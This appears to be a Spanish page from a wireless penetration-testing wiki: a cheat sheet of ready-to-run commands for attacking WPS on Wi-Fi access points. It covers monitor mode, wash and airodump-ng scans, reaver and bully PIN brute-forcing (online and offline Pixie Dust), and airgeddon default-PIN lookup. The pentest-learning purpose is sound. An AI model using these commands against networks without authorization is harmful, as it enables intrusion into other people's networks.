🟤
Wireless Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Dispositivos inalámbricos
  • Wi-Fi
    • General
    • Tarjeta inalámbrica
    • Wireshark
    • Aircrack-ng
    • WEP
    • WPA/WPA2
    • WPA Enterprise
    • WPS
    • Rogue access point
    • Conexión de red manual
Con tecnología de GitBook
En esta página

¿Te fue útil?

  1. Wi-Fi

WPS

WPS, Wi-Fi Protected Setup.

Habilitar modo monitor en tarjeta inalámbrica.

sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info

Identificación de APs (access points) con WPS habilitado.

# wash 2.4 GHz
sudo wash -i <interface-mon>
# wash 5 GHz
sudo wash -i <interface-mon> -5
# airodump-ng
sudo airodump-ng <interface-mon> --wps

Ataque de fuerza bruta en línea (online).

sudo reaver -b <BSSID> -i <interface-mon> -v

Ataque de fuerza bruta fuera de línea (offline).

sudo reaver -b <BSSID> -i <interface-mon> -v -K
sudo bully -b <BSSID> -d -v 4 <interface-mon>

PIN predeterminados que dependen de los primeros tres bytes del BSSID.

# airgeddon
## carga de matriz de PIN en la memoria
source /usr/share/airgeddon/known_pins.db
## búsqueda de PIN predeterminado según los primeros tres bytes del BSSID
echo ${PINDB["001122"]}

Verificación de PIN.

sudo reaver -b <BSSID> -i <interface-mon> -p "<pin>"
sudo bully -b <BSSID> -B -p "<pin>" -c <channel> <interface-mon> --force
AnteriorWPA EnterpriseSiguienteRogue access point

Última actualización hace 2 años

¿Te fue útil?